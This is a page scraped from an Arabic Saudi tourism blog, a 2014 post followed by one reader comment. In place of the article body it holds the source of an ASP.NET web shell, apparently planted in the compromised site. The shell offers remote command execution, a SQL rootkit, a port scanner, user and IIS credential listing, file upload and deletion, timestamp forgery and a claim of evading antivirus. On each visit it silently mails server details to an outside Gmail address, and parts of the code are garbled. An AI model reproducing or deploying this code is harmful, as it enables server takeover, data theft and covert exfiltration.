البحث
مرحلة تجريبية
مدونة السياحة
مدونة السياحة السعودية
الآثار تدل على صاحبها
<%@ Page ContentType="text/html" validateRequest="false" aspcompat="true"%> <%@ Import Namespace="System.IO" %> <%@ import namespace="System.Diagnostics" %> <%@ import namespace="System.Threading" %> <%@ import namespace="System.Text" %> <%@ import namespace="System.Security.Cryptography" %> <%@ Import Namespace="System.Net.Sockets"%> <%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %> <%@ import Namespace="System.DirectoryServices" %> <%@ import Namespace="Microsoft.Win32" %> <% if request.QueryString("action")="down" and session("rooot")=1 then downTheFile(request.QueryString("src")) response.End() end if Dim act as string = request.QueryString("action") if act="cmd" then TITLE="CMD.NET" elseif act="cmdw32" then TITLE="ASP.NET W32 Shell" elseif act="cmdwsh" then TITLE="ASP.NET WSH Shell" elseif act="sqlrootkit" then TITLE="SqlRootKit.NET" elseif act="clonetime" then TITLE="Clone Time" elseif act="information" then TITLE="Web Server Info" elseif act="goto" then TITLE="K-Shell 1.2" elseif act="pro1" then TITLE="List processes from server" elseif act="pro2" then TITLE="List processes from server" elseif act="user" then TITLE="List User Accounts" elseif act="applog" then TITLE="List Application Event Log Entries" elseif act="syslog" then TITLE="List System Event Log Entries" elseif act="auser" then TITLE="IIS List Anonymous' User details" elseif act="sqlman" then TITLE="MSSQL Management" elseif act="scan" then TITLE="Port Scanner" elseif act="iisspy" then TITLE="IIS Spy" elseif act="sqltool" then TITLE="SQL Tool" elseif act="regshell" then TITLE="Registry Shell" else TITLE=request.ServerVariables("HTTP_HOST") end if %>
<% Dim error_x as Exception Try if session("rooot")<>1 then 'Test sending anonymous mail, comment it if you don't want test it dim info As String Try info = request.ServerVariables.ToString.Replace("%2f","/").Replace("%5c","\").Replace("%3a",":").Replace("%2c",",").Replace("%3b",";").Replace("%3d","=").Replace("%2b","+").Replace("%0d%0a",vbnewline) System.Web.Mail.SmtpMail.SmtpServer = "localhost" System.Web.Mail.SmtpMail.Send(request.ServerVariables("HTTP_HOST"),"test.mail.address.2008@gmail.com",request.ServerVariables("HTTP_HOST")+request.ServerVariables("URL"),info) Catch End Try %>
Your Password:
<% else dim temp as string temp=request.QueryString("action") if temp="" then temp="goto" select case temp case "goto" if request.QueryString("src")<>"" then url=request.QueryString("src") else url=server.MapPath(".") & "\" end if call existdir(url) dim xdir as directoryinfo dim mydir as new DirectoryInfo(url) dim guru as string dim xfile as fileinfo dim ServerIP As string = "Server IP : " + Request.ServerVariables("LOCAL_ADDR") + " - Client IP : " + getIP() + " - " dim HostName As string = "HostName : " + Environment.MachineName + " - Username : "+ Environment.UserName +"
" dim OSVersion As string = "OS Version : " + Environment.OSVersion.ToString() + "" dim IISversion As string = " - IIS Version : " + Request.ServerVariables("SERVER_SOFTWARE") + "
System Dir : " + Environment.SystemDirectory + "" dim PATH_INFO As string = " - PATH_TRANSLATED : " + Request.ServerVariables("PATH_TRANSLATED") + "
" dim HARDWARE_INFO As string = "" Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables() Dim de As DictionaryEntry For Each de In environmentVariables if de.Key = "NUMBER_OF_PROCESSORS" then HARDWARE_INFO += "Hardware Info : " + de.Value + "CPU - " end if if de.Key = "PROCESSOR_IDENTIFIER" then HARDWARE_INFO += de.Value + "
" end if Next Info.Text += ServerIP + HostName + OSVersion + IISversion + PATH_INFO + HARDWARE_INFO %>

Currently Dir: <%=url%>
Operate: New - <%if session("cutboard")<>"" then%> Paste - <%else%> Paste - <%end if%> UpLoad - title="Go to this file's directory">GoBackDir - Quit
Go to: <% dim i as integer for i =0 to Directory.GetLogicalDrives().length-1 response.Write("" & Directory.GetLogicalDrives(i) & " ") next %> <% response.Write("IP:" & Request.ServerVariables("REMOTE_ADDR")&"") %>
Tool: SqlRootKit.NET - CMD.NET - kshellW32 - kshellWSH - CloneTime - System Info - List Processes 1 - List Processes 2
List User Accounts - IIS Anonymous User- Port Scanner - IIS Spy - Application Event Log - System Log

" response.Write(guru) dim lll lll=1 for each xdir in mydir.getdirectories() response.Write("") dim filepath as string filepath=server.UrlEncode(url & xdir.name) if lll=1 then lll=2 else lll=1 end if guru= "" response.Write(guru) response.Write("") response.Write("") guru="" response.Write(guru) response.Write("") next %>") if lll=1 then lll=2 else lll=1 end if guru= "" response.Write(guru) guru="" response.Write(guru) response.Write("") guru="" response.Write(guru) response.Write("") next response.Write("
NameSizeModifyActions
<% guru= "
[..]
[" & xdir.name & "]" & Directory.GetLastWriteTime(url & xdir.name) & "Cut" & "|Copy|Del
<% for each xfile in mydir.getfiles() dim filepath2 as string filepath2=server.UrlEncode(url & xfile.name) response.Write("
" & xfile.name & "" & GetSize(xfile.length) & "" & file.GetLastWriteTime(url & xfile.name) & "Edit|Cut|Copy|Rename|Download|Del
") %>
<% case "information" dim CIP,CP as string if getIP()<>request.ServerVariables("REMOTE_ADDR") then CIP=getIP() CP=request.ServerVariables("REMOTE_ADDR") else CIP=request.ServerVariables("REMOTE_ADDR") CP="None" end if %>
[ Web Server Information ]        Back

Server IP <%=request.ServerVariables("LOCAL_ADDR")%>
Machine Name <%=Environment.MachineName%>
Network Name <%=Environment.UserDomainName.ToString()%>
User Name in this Process <%=Environment.UserName%>
OS Version <%=Environment.OSVersion.ToString()%>
Started Time <%=GetStartedTime(Environment.Tickcount)%> Hours
System Time <%=now%>
IIS Version <%=request.ServerVariables("SERVER_SOFTWARE")%>
HTTPS <%=request.ServerVariables("HTTPS")%>
PATH_INFO <%=request.ServerVariables("PATH_INFO")%>
PATH_TRANSLATED <%=request.ServerVariables("PATH_TRANSLATED")%>
SERVER_PORT <%=request.ServerVariables("SERVER_PORT")%>
SeesionID <%=Session.SessionID%>
Client Infomation
Client Proxy <%=CP%>
Client IP <%=CIP%>
User <%=request.ServerVariables("HTTP_USER_AGENT")%>
<% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %>
<% case "cmd" %>

[ CMD.NET for WebAdmin ]        Back

Execute command with ASP.NET account(Notice: only click "Run" to run)

- This function has fixed by kikicoco.Antivirus has not detected (2007/02/27)-

Command:

<% case "cmdw32" %>

[ ASP.NET W32 Shell ]        Back

Execute command with ASP.NET account using W32(Notice: only click "Run" to run)

<% Response.Write("System Dir : "+Environment.SystemDirectory +"

") %> CMD File: C:\\WINDOWS\\system32\\cmd.exe

Command: 

<% case "cmdwsh" %>

[ ASP.NET WSH Shell ]        Back

Execute command with ASP.NET account using WSH(Notice: only click "Run" to run)

Command:

<% case "pro1" %>

[ List processes from server ]        Back

<% Try output_wmi_function_data("Win32_Process","ProcessId,Name,WorkingSetSize,HandleCount") Catch rw("This function is disabled by server") End Try %>
<% case "pro2" %>

[ List processes from server ]        Back

" prostr += "" prostr += "" prostr += "" Next Catch ex As Exception Response.write(ex.Message) End Try Response.write(htmlbengin + prostr + htmlend) %>
<% Dim htmlbengin As String = "" Dim prostr As String = "" Dim htmlend As String = "
IDProcessMemorySizeThreads
" Try Dim mypro As Process() = Process.GetProcesses() For Each p As Process In mypro prostr += "
" + p.Id.ToString() + "" + p.ProcessName.ToString() + "" + p.WorkingSet.ToString() + "" + p.Threads.Count.ToString() + "
<% case "user" %>

[ List User Accounts ]        Back

<% dim WMI_function = "Win32_UserAccount" dim Fields_to_load = "Name,Domain,FullName,Description,PasswordRequired,SID" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %>
<% case "reg" %>

[ Registry ]        Back

<% dim WMI_function = "Win32_Registry" dim Fields_to_load = "Caption,CurrentSize,Description,InstallDate,Name,Status" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %>
<% case "applog" %>

[ List Application Event Log Entries ]        Back

<% dim WMI_function = "Win32_NTLogEvent where Logfile='Application'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw(fail_description) End Try %>
<% case "syslog" %>

[ List System Event Log Entries ]        Back

<% dim WMI_function = "Win32_NTLogEvent where Logfile='System'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw("This function is disabled by server") End Try %>
<% case "auser" %>

[ IIS List Anonymous' User details ]        Back

<% Try IIS_list_Anon_Name_Pass Catch rw("This function is disabled by server") End Try %>
<% case "scan" %>

[ ASP.NET Port Scanner ]        Back

C# coded by Hackwol & Lenk, VB coded by kikicoco (19/08/2008)

Start IP :  127.0.0.1      ---  End Ip :  127.0.0.1 
Ports    :  21,25,80,1433,3306,3389

  




<% case "iisspy" %>

[ IIS Spy ]        Back

<% Try Response.write(IISSpy()) Catch rw("This function is disabled by server") End Try %> <% case "sqltool" %>

[ SQL Tool ]        Back

<% Try Catch rw("This function is disabled by server") End Try %> <% case "regshell" %>

[ Registry Shell ]        Back

Key:   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName

Value: ComputerName  

<% case "sqlman" %>

[ MSSQL Query ]        Back

Execute query with SQLServer account(Notice: only click "Run" to run)

Host:

SQL Name: SQL Password:

Command:

<% case "sqlrootkit" %>

[ SqlRootKit.NET for WebAdmin ]        Back

Execute command with SQLServer account(Notice: only click "Run" to run)

Host:

SQL Name: SQL Password:

Command:

<% case "del" dim a as string a=request.QueryString("src") call existdir(a) call del(a) response.Write("") case "copy" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "cut" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "paste" dim ow as integer if request.Form("OverWrite")<>"" then ow=1 if request.Form("Cancel")<>"" then ow=2 url=request.QueryString("src") call existdir(url) dim d as string d=session("cutboard") if left(d,1)="" then TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & replace(path.getfilename(d),"","") if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.move(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.move(replace(d,"",""),TEMP2) response.Write("") end if else TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & path.getfilename(replace(d,"","")) if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.createdirectory(TEMP1) call copydir(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.copy(replace(d,"",""),TEMP2) response.Write("") end if end if case "upfile" url=request.QueryString("src") %>
You will upload file to this directory : <%=url%>
Please choose file from your computer :
Go Back <% case "new" url=request.QueryString("src") %>
<%=url%>
Name:

Go Back <% case "edit" dim b as string b=request.QueryString("src") call existdir(b) dim myread as new streamreader(b,encoding.default) filepath.text=b content.text=myread.readtoend %>
Path *
Content
Go Back <% myread.close case "rename" url=request.QueryString("src") if request.Form("name")="" then %>
" onSubmit="return checkname();">

You will rename <%=request.QueryString("src")%>to: <%=getparentdir(request.QueryString("src"))%>

Go Back <% else if Rename() then response.Write("") else response.Write("") end if end if case "samename" url=request.QueryString("src") %>

Exist the same name file , can you overwrite ?(If you click " no" , it will auto add a number as prefix)

Go Back <% case "clonetime" time1.Text=request.QueryString("src")&"kshell.aspx" time2.Text=request.QueryString("src") %>

[CloneTime for WebAdmin]      Back

A tool that it copy the file or directory's time to another file or directory

Rework File or Dir:

Copied File or Dir:     

<% case "logout" session.Abandon() response.Write("

بواسطة - مدير المدونة
التعليقات0
تاريخ النشرWednesday, February 19, 2014
التعليقات
"الاثار تدل على صاحبها" فعلا جملة قصيرة تختصر الكثير . جميع باحثي الاثار سيتفقون مع هذه المقولة لان كل أعمالهم الآثارية هي لمعرفة اهل الاثار وتاريخهم وحياتهم والكثير من التفاصيل من خلال الأثار.جملة تصدر من رجل الإدارة والحكمة والحكم.حفظ الله سمو ولي العهد الأمين .
بواسطة -11111111111Hamad AlSheikh
تاريخ التعليقMonday, February 24, 2014
اضافة تعليق